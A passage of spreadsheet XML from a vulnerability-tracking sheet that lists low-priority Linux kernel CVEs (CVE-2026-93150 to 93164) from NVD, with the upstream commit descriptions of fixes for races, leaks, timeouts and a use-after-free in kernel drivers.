      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q967" s="5" t="inlineStr"/>
      <c r="R967" s="5" t="inlineStr"/>
      <c r="S967" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cgroup/cpuset: Make nr_deadline_tasks an atomic_t
The nr_deadline_tasks variable in the cpuset structure was introduced by
commit 6c24849f5515 ("sched/cpuset: Keep track of SCHED_DEADLINE task
in cpusets"). It is reported by sashiko [1] that nr_deadline_tasks
can currently be modified by inc_dl_tasks_cs() under rq-&gt;lock and
by cpuset_attach() under cpuset_mutex. So if both updates happen
simultaneously, the nr_deadline_tasks variable can be corrupted leading
to incorrect operations down the road.
Fix that by changing its type to atomic_t so that nr_deadline_tasks
are always atomically updated. This fix patch is a low hanging fruit.
It can handle some of the races between a concurrent sched_setscheduler()
and cpuset_can_attach()/cpuset_attach() calls, but not all of them like
the other issue raised by sashiko [2]. This will be handled hopefully
in a future follow up patch.
[1] https://sashiko.dev/#/patchset/20260626181923.133658-1-longman%40redhat.com
[2] https://sashiko.dev/#/patchset/20260630033344.352702-1-longman%40redhat.com</t>
        </is>
      </c>
      <c r="T967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93150</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93151</t>
        </is>
      </c>
      <c r="D968" s="5" t="inlineStr"/>
      <c r="E968" s="5" t="inlineStr"/>
      <c r="F968" s="5" t="inlineStr"/>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="inlineStr"/>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q968" s="5" t="inlineStr"/>
      <c r="R968" s="5" t="inlineStr"/>
      <c r="S968" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-rdma: fix response resource leak on queue teardown
When an nvme target with rdma transport is removed while I/Os are in
flight, a response can be posted but its send completion is never
delivered before the connection is torn down. As a result
nvmet_rdma_send_done() and nvmet_rdma_release_rsp() are never called for
the response, and this leaks the allocated RDMA read/write context and
request SGLs.
These leaks are recreated by running blktests nvme/061 with the rdma
transport and the siw driver. Kernel kmemleak feature reports them as
follows:
  unreferenced object 0xffff88812bc490c0 (size 32):
    comm "kworker/2:1H", pid 409, jiffies 4307744490
    backtrace (crc 89afd339):
      __kmalloc_noprof+0x5f9/0x890
      sgl_alloc_order+0x7b/0x380
      nvmet_req_alloc_sgls+0x290/0x4f0 [nvmet]
      nvmet_rdma_map_sgl_keyed+0x241/0x12e0 [nvmet_rdma]
      nvmet_rdma_handle_command+0x73e/0xb80 [nvmet_rdma]
      __ib_process_cq+0x149/0x4c0 [ib_core]
      ib_cq_poll_work+0x49/0x160 [ib_core]
      process_one_work+0x8b2/0x1640
      worker_thread+0x5fd/0xfe0
      kthread+0x367/0x460
      ret_from_fork+0x655/0x9d0
      ret_from_fork_asm+0x1a/0x30
  unreferenced object 0xffff88814bd05e80 (size 64):
    comm "kworker/3:1H", pid 148, jiffies 4295195428
    backtrace (crc e35510cb):
      __kmalloc_noprof+0x5f9/0x890
      rdma_rw_ctx_init+0x333/0x1fa0 [ib_core]
      nvmet_rdma_map_sgl_keyed+0x5c8/0x12e0 [nvmet_rdma]
      nvmet_rdma_handle_command+0x73e/0xb80 [nvmet_rdma]
      __ib_process_cq+0x149/0x4c0 [ib_core]
      ib_cq_poll_work+0x49/0x160 [ib_core]
      process_one_work+0x8b2/0x1640
      worker_thread+0x5fd/0xfe0
      kthread+0x367/0x460
      ret_from_fork+0x655/0x9d0
      ret_from_fork_asm+0x1a/0x30
To avoid the memory leaks, reclaim the memory of the in-flight responses
when the queue QP is torn down. Call nvmet_rdma_free_rsp_resources()
that frees up the RDMA read/write context and the request SGLs of such
responses.</t>
        </is>
      </c>
      <c r="T968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93151</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93152</t>
        </is>
      </c>
      <c r="D969" s="5" t="inlineStr"/>
      <c r="E969" s="5" t="inlineStr"/>
      <c r="F969" s="5" t="inlineStr"/>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="inlineStr"/>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr"/>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q969" s="5" t="inlineStr"/>
      <c r="R969" s="5" t="inlineStr"/>
      <c r="S969" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-apple: Use acquire/release for queue enabled state
apple_nvme_init_queue() initializes queue state and then marks the queue
enabled. The interrupt and request paths check enabled before using that
queue state.
The old wmb() after WRITE_ONCE(enabled, true) does not publish the
earlier initialization before enabled becomes visible. Use a release store
when enabling the queue and acquire loads when testing it.
Although the shutdown-side enabled accesses are not used for publishing
queue initialization, use helpers for them as well for consistency.</t>
        </is>
      </c>
      <c r="T969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93152</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93153</t>
        </is>
      </c>
      <c r="D970" s="5" t="inlineStr"/>
      <c r="E970" s="5" t="inlineStr"/>
      <c r="F970" s="5" t="inlineStr"/>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="inlineStr"/>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr"/>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q970" s="5" t="inlineStr"/>
      <c r="R970" s="5" t="inlineStr"/>
      <c r="S970" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/bng_re: return a timeout when firmware responses stall
__wait_for_resp() documents that it returns a non-zero error when a
firmware command does not complete, and bng_re_rcfw_send_message() already
marks the firmware as stalled when the helper returns -ENODEV.
However, the helper ignores wait_event_timeout() expiry.  If the response
slot remains in use after the timeout and after the polled CREQ service
attempt, the loop starts another full timeout period and can repeat
forever.
Return -ENODEV after a timed out wait that still has no response.  The
existing caller then marks FIRMWARE_STALL_DETECTED and returns
-ETIMEDOUT to the command issuer.</t>
        </is>
      </c>
      <c r="T970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93153</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93154</t>
        </is>
      </c>
      <c r="D971" s="5" t="inlineStr"/>
      <c r="E971" s="5" t="inlineStr"/>
      <c r="F971" s="5" t="inlineStr"/>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="inlineStr"/>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr"/>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q971" s="5" t="inlineStr"/>
      <c r="R971" s="5" t="inlineStr"/>
      <c r="S971" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/irdma: Add refcounting to user ring MRs
Prevent userspace from deregistering the MRs that back QP/CQ/SRQ rings
by bumping the MR's refcount upon association.</t>
        </is>
      </c>
      <c r="T971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93154</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93155</t>
        </is>
      </c>
      <c r="D972" s="5" t="inlineStr"/>
      <c r="E972" s="5" t="inlineStr"/>
      <c r="F972" s="5" t="inlineStr"/>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="inlineStr"/>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q972" s="5" t="inlineStr"/>
      <c r="R972" s="5" t="inlineStr"/>
      <c r="S972" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: keembay - Fix AEAD unregister count in error path
register_aes_algs() registers the AEAD algorithms before registering the
skcipher algorithms.  If skcipher registration fails, the function unwinds
the earlier AEAD registration with crypto_engine_unregister_aeads(), but it
passes ARRAY_SIZE(algs), which is the skcipher table size.
Use ARRAY_SIZE(algs_aead) for the AEAD unwind path so the unregister helper
iterates over the same table that was registered.  Also clarify the nearby
comment: the crypto registration helpers clean up algorithms registered
within the same call, while this function must still unwind earlier
successful registration steps.</t>
        </is>
      </c>
      <c r="T972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93155</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93156</t>
        </is>
      </c>
      <c r="D973" s="5" t="inlineStr"/>
      <c r="E973" s="5" t="inlineStr"/>
      <c r="F973" s="5" t="inlineStr"/>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="inlineStr"/>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr"/>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q973" s="5" t="inlineStr"/>
      <c r="R973" s="5" t="inlineStr"/>
      <c r="S973" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: rk3288 - fail ahash requests on HASH idle timeout
rk_hash_run() waits for RK_CRYPTO_HASH_STS to become idle after the
final DMA transfer, but ignores the poll result. If the hash engine
never becomes idle, the driver still reads the digest registers and
finalizes the request with the previous success value.
Store the poll result and finalize the request with the timeout error
before reading the digest registers.</t>
        </is>
      </c>
      <c r="T973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93156</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93157</t>
        </is>
      </c>
      <c r="D974" s="5" t="inlineStr"/>
      <c r="E974" s="5" t="inlineStr"/>
      <c r="F974" s="5" t="inlineStr"/>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="inlineStr"/>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr"/>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q974" s="5" t="inlineStr"/>
      <c r="R974" s="5" t="inlineStr"/>
      <c r="S974" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwrng: xilinx-trng - propagate timeout before any data is read
xtrng_readblock32() polls for 16-byte chunks but returns the number of
bytes read even when the first poll times out. Its caller then treats a
zero return as a short successful read, and partial reads for full
32-byte blocks can make the tail copy use a fixed block offset rather
than the amount already produced.
Return the poll error when no data has been read, preserve partial
positive returns after some data is available, stop the generator on all
collection exits, and append tail bytes at the current output count.</t>
        </is>
      </c>
      <c r="T974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93157</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93158</t>
        </is>
      </c>
      <c r="D975" s="5" t="inlineStr"/>
      <c r="E975" s="5" t="inlineStr"/>
      <c r="F975" s="5" t="inlineStr"/>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="inlineStr"/>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr"/>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q975" s="5" t="inlineStr"/>
      <c r="R975" s="5" t="inlineStr"/>
      <c r="S975" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: sa2ul - stop probe if context pool creation fails
sa_ul_probe() calls sa_init_mem() to create the DMA pool used for
security context buffers, but ignores its return value. If pool creation
fails, probe still continues with DMA setup, algorithm registration and
child population even though later request setup depends on that pool.
Stop probing when sa_init_mem() fails, and route that failure to the PM
cleanup path without attempting to destroy an uncreated DMA pool.</t>
        </is>
      </c>
      <c r="T975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93158</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93159</t>
        </is>
      </c>
      <c r="D976" s="5" t="inlineStr"/>
      <c r="E976" s="5" t="inlineStr"/>
      <c r="F976" s="5" t="inlineStr"/>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="inlineStr"/>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr"/>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q976" s="5" t="inlineStr"/>
      <c r="R976" s="5" t="inlineStr"/>
      <c r="S976" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: atmel-sha204a - fix heap info leak on I2C transfer failure
The nonblocking RNG path allocates a work_data structure to track the
state of an in-flight asynchronous I2C request. This pointer is stored
in rng-&gt;priv and later consumed by the read path once the transaction
completes.
If the underlying I2C transfer fails, the completion callback is invoked
with a non-zero status. In this case, the allocated work_data is not
usable for producing RNG output and must not remain associated with the
hwrng state.
Previously, the failure path only logged a warning but left the pointer
state uncleared, which can result in subsequent read attempts observing
stale state and interpreting it as valid completion data.
Fix this by freeing the pending work_data. The I2C transaction reports
an error. This ensures that failed requests do not leave residual state
behind that could be interpreted as valid RNG data on later reads.
Clearing rng-&gt;priv is done at the subsequent call to nonblocking read.</t>
        </is>
      </c>
      <c r="T976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93159</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93160</t>
        </is>
      </c>
      <c r="D977" s="5" t="inlineStr"/>
      <c r="E977" s="5" t="inlineStr"/>
      <c r="F977" s="5" t="inlineStr"/>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="inlineStr"/>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q977" s="5" t="inlineStr"/>
      <c r="R977" s="5" t="inlineStr"/>
      <c r="S977" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: atmel-ecc - reject hardware ECDH without a public key
The hardware ECDH path in atmel_ecdh_compute_shared_secret() uses the
private key stored in the device. However, the public key is cached only
after atmel_ecdh_set_secret() successfully generated that private key
for the current tfm.
atmel_ecdh_generate_public_key() already rejects requests when no public
key is cached. Add the same check to atmel_ecdh_compute_shared_secret()
to prevent the device from using a private key that was not generated
for the current tfm.</t>
        </is>
      </c>
      <c r="T977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93160</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93161</t>
        </is>
      </c>
      <c r="D978" s="5" t="inlineStr"/>
      <c r="E978" s="5" t="inlineStr"/>
      <c r="F978" s="5" t="inlineStr"/>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="inlineStr"/>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr"/>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q978" s="5" t="inlineStr"/>
      <c r="R978" s="5" t="inlineStr"/>
      <c r="S978" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: qat - clear AES key schedule from stack
qat_alg_xts_reverse_key() expands the forward XTS AES key on the stack.
That schedule contains key material and can remain in the stack frame.
Clear the temporary crypto_aes_ctx with memzero_explicit() after the copy.</t>
        </is>
      </c>
      <c r="T978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93161</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93162</t>
        </is>
      </c>
      <c r="D979" s="5" t="inlineStr"/>
      <c r="E979" s="5" t="inlineStr"/>
      <c r="F979" s="5" t="inlineStr"/>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="inlineStr"/>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr"/>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q979" s="5" t="inlineStr"/>
      <c r="R979" s="5" t="inlineStr"/>
      <c r="S979" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: qat - cancel work on re-enable SR-IOV timeout
The QAT reset worker queues SR-IOV reenable work using a work_struct and
completion embedded in an on-stack adf_sriov_dev_data. If the completion
wait times out, the reset worker can return while device_sriov_wq still
holds or executes the stack-backed work item.
Cancel the work on the device_sriov_wq on timeout before the stack frame
unwinds.</t>
        </is>
      </c>
      <c r="T979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93162</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93163</t>
        </is>
      </c>
      <c r="D980" s="5" t="inlineStr"/>
      <c r="E980" s="5" t="inlineStr"/>
      <c r="F980" s="5" t="inlineStr"/>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="inlineStr"/>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr"/>
      <c r="L980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q980" s="5" t="inlineStr"/>
      <c r="R980" s="5" t="inlineStr"/>
      <c r="S980" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwrng: core - fix rng list on registration error
hwrng_register(rng) does the following:
1. Checks if rng has name and read methods set
2. Checks if the name already exists
3. Adds rng to global rng_list
4. May try to set rng to current_rng
If step 4 fails, it returns an error. However, it does not remove the
rng from rng_list, causing a dangling reference which can result in
use-after-free if the caller frees rng, since registration failed.
Add a list_del_init() cleanup step.</t>
        </is>
      </c>
      <c r="T980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93163</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93164</t>
        </is>
      </c>
      <c r="D981" s="5" t="inlineStr"/>
      <c r="E981" s="5" t="inlineStr"/>
      <c r="F981" s="5" t="inlineStr"/>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="inlineStr"/>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr"/>
      <c r="L981" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q981" s="5" t="inlineStr"/>
      <c r="R981" s="5" t="inlineStr"/>
      <c r="S981" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
uprobes/x86: Move optimized uprobe from nop5 to nop10
Andrii reported an issue with optimized uprobes [1] that can clobber
redzone area with call instruction storing return address on stack
where user code may keep temporary data without adjusting rsp.
Fixing this by moving the optimized uprobes on top of 10-bytes nop
instruction, so we can squeeze another instruction to escape the
redzone area before doing the call, like:
  lea -0x80(%rsp), %rsp
  call tramp
Note the lea instruction is used to adjust the rsp register without
changing the flags.
We use nop10 and following transformation to optimized instructions
above and back as suggested by Peterz [2].
Optimize path (int3_update_optimize):
  1) Initial state after set_swbp() installed the uprobe:
      cc 2e 0f 1f 84 00 00 00 00 00
     From offset 0 this is INT3 followed by the tail of the original
     10-byte NOP.
     After a previous unoptimization bytes 5..9 may still contain the
     old call instruction, which remains valid for threads already there.
  2) Rewrite the LEA tail and call displacement:
      cc [8d 64 24 80 e8 d0 d1 d2 d3]
     From offset 0 this traps on the uprobe INT3.  Bytes 1..9 are not
     executable entry points while byte 0 is trapped.
  3) Publish the first LEA byte:
      [48] 8d 64 24 80 e8 d0 d1 d2 d3
     From offset 0 this is:
        lea -0x80(%rsp), %rsp
        call &lt;uprobe-trampoline&gt;
Unoptimize path (int3_update_unoptimize):
  1) Initial optimized state:
      48 8d 64 24 80 e8 d0 d1 d2 d3
     Same as 3) above.
  2) Trap new entries before restoring the NOP bytes:
      [cc] 8d 64 24 80 e8 d0 d1 d2 d3
     From offset 0 this traps. A thread that had already executed the
     LEA can still reach the intact CALL at offset 5.
  3) Restore bytes 1..4 of the original NOP while keeping byte 0 trapped
     and byte 5 as CALL.
      cc [2e 0f 1f 84] e8 d0 d1 d2 d3
     From offset 0 this still traps. Offset 5 is still the CALL for any
     thread that was already past the first LEA byte.
  4) Publish the first byte of the original NOP:
      [66] 2e 0f 1f 84 e8 d0 d1 d2 d3
